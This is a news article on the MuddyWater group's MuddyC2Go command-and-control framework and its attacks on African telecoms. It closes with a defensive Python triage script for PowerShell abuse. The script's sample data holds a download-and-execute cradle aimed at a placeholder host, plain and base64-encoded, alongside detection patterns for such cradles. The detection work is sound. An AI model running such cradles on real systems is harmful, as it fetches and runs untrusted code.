Cyber Warfare fragments: attacks in Africa with MuddyC2Go
Under the radar: operational tactics and emerging tools of the MuddyWater group
Iranian hacker group MuddyWater has stepped up attacks on telecommunications in Africa using a new system called MuddyC2Go. This remotely managed command and control system facilitates cyber attacks and spreads through phishing emails or by exploiting vulnerabilities in outdated software. MuddyWater tries to remain undetected for as long as possible in order to achieve its goals.
An Iranian state actor known as MuddyWater has stepped up its attacks against the telecommunications sector in several African countries, employing a new command and control (C2) platform called MuddyC2Go. Also identified as Seedworm, and with other aliases such as Boggy Serpens and Cobalt Ulster, the group allegedly operates under the orders of the Iranian Ministry of Intelligence and Security (MOIS). The attacks are predominantly concentrated in the Middle East but, as reported by the Symantec Threat Hunter Team, have recently spread to Egypt, Sudan and Tanzania.
Features and usage of the MuddyC2Go framework
The MuddyC2Go framework, developed in Golang, was first identified by Deep Instinct as a successor to PhonyC2 and MuddyC3, although there are hints that suggest it was in use as early as 2020. The full breadth of its capabilities is not yet clear, but it comes with a PowerShell script that automatically connects to the C2 server managed by Seedworm, allowing remote access to the system without manual intervention.
Operational methods in recent attacks
Attacks in November 2023 have shown the combined use of legitimate tools such as SimpleHelp and Venom Proxy, custom keyloggers and other publicly available tools. MuddyWater's attack chains start with phishing emails and the exploitation of known vulnerabilities in outdated applications, followed by reconnaissance, lateral movement and data collection within the victim networks.
MuddyWater's innovation strategy for achieving its goals
By mixing proprietary tools, living-off-the-land techniques and public tools, MuddyWater aims to evade detection for as long as possible in order to accomplish its strategic goals. Symantec highlights the group's constant innovation and development of its arsenal to remain covert, and points to heavy use of PowerShell and related scripts as an indicator of suspicious activity. In parallel, an Israel-linked group known as Gonjeshke Darande (“Raider Hawk” in Persian) has claimed cyber sabotage acts affecting most gas stations in Iran, in response to regional aggression by the Islamic Republic and its affiliates.
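Symantec's observation that heavy PowerShell use is itself an indicator can be turned into a concrete triage rule. The following Python script is an added example written for this article; it is not code from Symantec, Deep Instinct or the group's tooling, and its heuristics are generic script-host abuse patterns, not MuddyC2Go signatures. It scores constructed process-creation records (parent process, image, command line) for Office applications spawning PowerShell or wscript, encoded commands (which it decodes from UTF-16LE base64 and re-scans), hidden windows, execution-policy bypass, download cradles and scripts run from a user's Temp folder. The sample events, the `example.invalid` URL and the rule weights are all made-up assumptions to be tuned against real telemetry.

```python
"""Heuristic triage of process-creation records for suspicious PowerShell use.
Added example for this article; rules are generic, not MuddyWater signatures."""
import base64
import re
from dataclasses import dataclass

# Parents that rarely have a legitimate reason to launch a script host (assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts prefixes).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")
# Download / invoke cradles; checked on the raw command line and on any decoded payload.
CRADLE_RE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|net\.webclient"
)
# (weight, reason, pattern) rules applied to the raw command line. Weights are arbitrary.
RULES = [
    (1, "hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    (1, "execution policy bypass", re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass")),
    (1, "profile suppressed", re.compile(r"(?i)-nop(?:rofile)?\b")),
    (2, "script launched from user temp/appdata",
     re.compile(r'(?i)\\(?:temp|appdata)\\[^\s"]+\.(?:ps1|vbs|js|hta)')),
]


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent: str, image: str, cmdline: str):
    """Score one process-creation record; returns (score, list of reasons)."""
    score, reasons = 0, []
    if parent.lower() in OFFICE_PARENTS and image.lower() in SCRIPT_HOSTS:
        score += 3
        reasons.append(f"{parent} spawned {image}")
    if ENCODED_RE.search(cmdline):
        score += 2
        reasons.append("encoded command")
    for weight, reason, rx in RULES:
        if rx.search(cmdline):
            score += weight
            reasons.append(reason)
    decoded = decode_encoded_command(cmdline) or ""
    if CRADLE_RE.search(cmdline + "\n" + decoded):
        score += 3
        reasons.append("download/invoke cradle")
    return score, reasons


@dataclass
class Finding:
    index: int
    score: int
    reasons: list


def triage(events, threshold: int = 3):
    """Return a Finding for every (parent, image, cmdline) record at or above threshold."""
    findings = []
    for i, (parent, image, cmdline) in enumerate(events):
        score, reasons = score_event(parent, image, cmdline)
        if score >= threshold:
            findings.append(Finding(i, score, reasons))
    return findings


# Constructed sample records (not real telemetry). The encoded payload is built here
# so the base64 is exact; example.invalid is a reserved, non-resolving domain.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
    ("winword.exe", "powershell.exe", f"powershell.exe -nop -w hidden -ep bypass -enc {_ENC}"),
    ("cmd.exe", "powershell.exe",
     "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("outlook.exe", "wscript.exe", r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.index}: score {f.score}: {', '.join(f.reasons)}")
```

The weighted-rule design matters more than the exact patterns: a single weak signal such as `-NoProfile` stays below the alert threshold, while an Office parent plus an encoded, hidden, policy-bypassing download cradle stacks up quickly. Decoding the `-EncodedCommand` payload before matching is what keeps base64-wrapped cradles from slipping past a plain-text rule.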
12/19/2023 12:28
Marco Verro